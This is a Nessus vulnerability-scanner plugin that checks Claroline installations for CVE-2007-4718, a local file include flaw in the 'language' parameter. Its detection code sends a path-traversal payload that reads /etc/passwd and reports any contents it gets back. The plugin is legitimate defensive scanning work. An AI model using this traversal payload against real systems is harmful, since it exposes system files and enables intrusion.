#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is susceptible to a
local file include attack. 

Description :

The version of Claroline installed on the remote host fails to
sanitize user-supplied input to the 'language' parameter before using
it to include PHP code in the 'load_translation' method in
'claroline/inc/lib/language.lib.php'.  Regardless of PHP's
'register_globals' setting, an unauthenticated remote attacker may be
able to exploit this issue to view arbitrary files or to execute
arbitrary PHP code on the remote host, subject to the privileges of
the web server user id. 

In addition, the version is likely to be affected by several cross-
site scripting issues involving administrative scripts, although
Nessus did not check for them. 

See also :

http://www.claroline.net/forum/viewtopic.php?t=13533
http://www.claroline.net/wiki/index.php/Changelog_1.8.x

Solution :

Upgrade to Claroline 1.8.6 or later.

Risk factor :

Medium / CVSS Base Score : 5.1
(CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(26011);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-4718");
  script_bugtraq_id(25521);
  script_xref(name:"OSVDB", value:"38987");

  script_name(english:"Claroline language Parameter Local File Include Vulnerability");
  script_summary(english:"Tries to read a local file with Claroline");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("claroline_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/claroline"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Try to retrieve a local file.
  file = "../../../../../../../../../../../../etc/passwd%00";
  req = http_get(
    item:string(
      dir, "/?",
      "language=", file
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if there's an entry for root.
  if (egrep(pattern:"root:.*:0:[01]:", string:res))
  {
    contents = res - strstr(res, "<br />");
    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Here are the repeated contents of the file '/etc/passwd' that\n",
      "Nessus was able to read from the remote host :\n",
      "\n",
      contents
    );
    security_warning(port:port, data:report);
    exit(0);
  }
}
